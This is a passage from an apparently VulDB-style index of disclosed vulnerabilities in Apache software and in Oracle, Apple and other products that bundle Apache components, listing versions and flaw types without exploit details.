3974| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
3975| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
3976| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
3977| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
3978| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
3979| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
3980| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
3981| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
3982| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
3983| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
3984| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
3985| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
3986| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
3987| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
3988| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
3989| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
3990| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
3991| [127007] Apache Spark Request Code Execution
3992| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
3993| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
3994| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
3995| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
3996| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
3997| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
3998| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
3999| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
4000| [126346] Apache Tomcat Path privilege escalation
4001| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
4002| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
4003| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
4004| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
4005| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
4006| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
4007| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
4008| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
4009| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
4010| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
4011| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
4012| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
4013| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
4014| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
4015| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
4016| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
4017| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
4018| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
4019| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
4020| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
4021| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
4022| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
4023| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
4024| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
4025| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
4026| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
4027| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
4028| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
4029| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
4030| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
4031| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
4032| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
4033| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
4034| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
4035| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
4036| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
4037| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
4038| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
4039| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
4040| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
4041| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
4042| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
4043| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
4044| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
4045| [123197] Apache Sentry up to 2.0.0 privilege escalation
4046| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
4047| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
4048| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
4049| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
4050| [122800] Apache Spark 1.3.0 REST API weak authentication
4051| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
4052| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
4053| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
4054| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
4055| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
4056| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
4057| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
4058| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
4059| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
4060| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
4061| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
4062| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
4063| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
4064| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
4065| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
4066| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
4067| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
4068| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
4069| [121354] Apache CouchDB HTTP API Code Execution
4070| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
4071| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
4072| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
4073| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
4074| [120168] Apache CXF weak authentication
4075| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
4076| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
4077| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
4078| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
4079| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
4080| [119306] Apache MXNet Network Interface privilege escalation
4081| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
4082| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
4083| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
4084| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
4085| [118143] Apache NiFi activemq-client Library Deserialization denial of service
4086| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
4087| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
4088| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
4089| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
4090| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
4091| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
4092| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
4093| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
4094| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
4095| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
4096| [117115] Apache Tika up to 1.17 tika-server command injection
4097| [116929] Apache Fineract getReportType Parameter privilege escalation
4098| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
4099| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
4100| [116926] Apache Fineract REST Parameter privilege escalation
4101| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
4102| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
4103| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
4104| [115883] Apache Hive up to 2.3.2 privilege escalation
4105| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
4106| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
4107| [115518] Apache Ignite 2.3 Deserialization privilege escalation
4108| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
4109| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
4110| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
4111| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
4112| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
4113| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
4114| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
4115| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
4116| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
4117| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
4118| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
4119| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
4120| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
4121| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
4122| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
4123| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
4124| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
4125| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
4126| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
4127| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
4128| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
4129| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
4130| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
4131| [113895] Apache Geode up to 1.3.x Code Execution
4132| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
4133| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
4134| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
4135| [113747] Apache Tomcat Servlets privilege escalation
4136| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
4137| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
4138| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
4139| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
4140| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
4141| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4142| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
4143| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
4144| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
4145| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
4146| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
4147| [112885] Apache Allura up to 1.8.0 File information disclosure
4148| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
4149| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
4150| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
4151| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
4152| [112625] Apache POI up to 3.16 Loop denial of service
4153| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
4154| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
4155| [112339] Apache NiFi 1.5.0 Header privilege escalation
4156| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
4157| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
4158| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
4159| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
4160| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
4161| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
4162| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
4163| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
4164| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
4165| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
4166| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
4167| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
4168| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
4169| [112114] Oracle 9.1 Apache Log4j privilege escalation
4170| [112113] Oracle 9.1 Apache Log4j privilege escalation
4171| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
4172| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
4173| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
4174| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
4175| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
4176| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
4177| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
4178| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
4179| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
4180| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
4181| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
4182| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
4183| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
4184| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
4185| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
4186| [110701] Apache Fineract Query Parameter sql injection
4187| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
4188| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
4189| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
4190| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
4191| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
4192| [110106] Apache CXF Fediz Spring cross site request forgery
4193| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
4194| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
4195| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
4196| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
4197| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
4198| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
4199| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
4200| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
4201| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
4202| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
4203| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
4204| [108938] Apple macOS up to 10.13.1 apache denial of service
4205| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
4206| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
4207| [108935] Apple macOS up to 10.13.1 apache denial of service
4208| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
4209| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
4210| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
4211| [108931] Apple macOS up to 10.13.1 apache denial of service
4212| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
4213| [108929] Apple macOS up to 10.13.1 apache denial of service
4214| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
4215| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
4216| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
4217| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
4218| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
4219| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
4220| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
4221| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
4222| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
4223| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
4224| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
4225| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
4226| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
4227| [108782] Apache Xerces2 XML Service denial of service
4228| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
4229| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
4230| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
4231| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
4232| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
4233| [108629] Apache OFBiz up to 10.04.01 privilege escalation
4234| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
4235| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
4236| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
4237| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
4238| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
4239| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
4240| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
4241| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
4242| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
4243| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
4244| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
4245| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
4246| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
4247| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
4248| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4249| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
4250| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
4251| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4252| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
4253| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
4254| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
4255| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
4256| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
4257| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
4258| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
4259| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
4260| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
4261| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
4262| [107639] Apache NiFi 1.4.0 XML External Entity
4263| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
4264| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
4265| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
4266| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
4267| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
4268| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
4269| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
4270| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
4271| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
4272| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
4273| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
4274| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4275| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4276| [107197] Apache Xerces Jelly Parser XML File XML External Entity
4277| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
4278| [107084] Apache Struts up to 2.3.19 cross site scripting
4279| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
4280| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
4281| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
4282| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
4283| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
4284| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
4285| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
4286| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
4287| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
4288| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
4289| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
4290| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
4291| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4292| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4293| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
4294| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
4295| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
4296| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
4297| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
4298| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
4299| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
4300| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
4301| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
4302| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
4303| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
4304| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
4305| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
4306| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
4307| [105878] Apache Struts up to 2.3.24.0 privilege escalation
4308| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
4309| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
4310| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
4311| [105643] Apache Pony Mail up to 0.8b weak authentication
4312| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
4313| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
4314| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
4315| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
4316| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
4317| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
4318| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
4319| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
